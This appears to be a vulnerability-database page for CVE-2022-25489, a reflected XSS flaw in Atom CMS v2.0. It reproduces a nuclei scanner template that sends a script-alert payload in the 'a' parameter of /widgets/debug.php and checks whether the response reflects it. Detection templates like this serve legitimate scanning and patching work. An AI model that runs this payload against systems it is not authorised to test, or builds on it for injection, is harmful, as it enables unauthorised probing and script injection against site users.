Lucene search
K

Atom CMS v2.0 - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Atom CMS v2.0 - Reflected XSS via "A" parameter in /widgets/debug.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-25489
15 Mar 202218:15
attackerkb
Circl
CVE-2022-25489
15 Mar 202221:19
circl
CNNVD
Atom CMS 跨站脚本漏洞
15 Mar 202200:00
cnnvd
CNVD
Atom CMS Cross-Site Scripting Vulnerability (CNVD-2022-84074)
16 Mar 202200:00
cnvd
CVE
CVE-2022-25489
15 Mar 202217:40
cve
Cvelist
CVE-2022-25489
15 Mar 202217:40
cvelist
EUVD
EUVD-2022-30158
3 Oct 202520:07
euvd
NVD
CVE-2022-25489
15 Mar 202218:15
nvd
OSV
CVE-2022-25489
15 Mar 202218:15
osv
Prion
Cross site scripting
15 Mar 202218:15
prion
Rows per page
id: CVE-2022-25489

info:
  name: Atom CMS v2.0 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: Fixed in version Atom CMS v2.1
  reference:
    - https://github.com/thedigicraft/Atom.CMS/issues/258
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25489
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-25489
    cwe-id: CWE-79
    epss-score: 0.01459
    epss-percentile: 0.70328
    cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thedigitalcraft
    product: atomcms
  tags: cve,cve2022,xss,atom,cms,thedigitalcraft,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Path Array"
          - "console-debug"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201d67c19e6e5f8b46fdc288f285dd163f0724573b8beb29e012b3512e69e8ffb1022100a799844391795fc24f5e9e165de39ae8533c69a4205c48ba677ac1c0a992dccf:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 23.5
CVSS 3.15.4
EPSS0.01459
29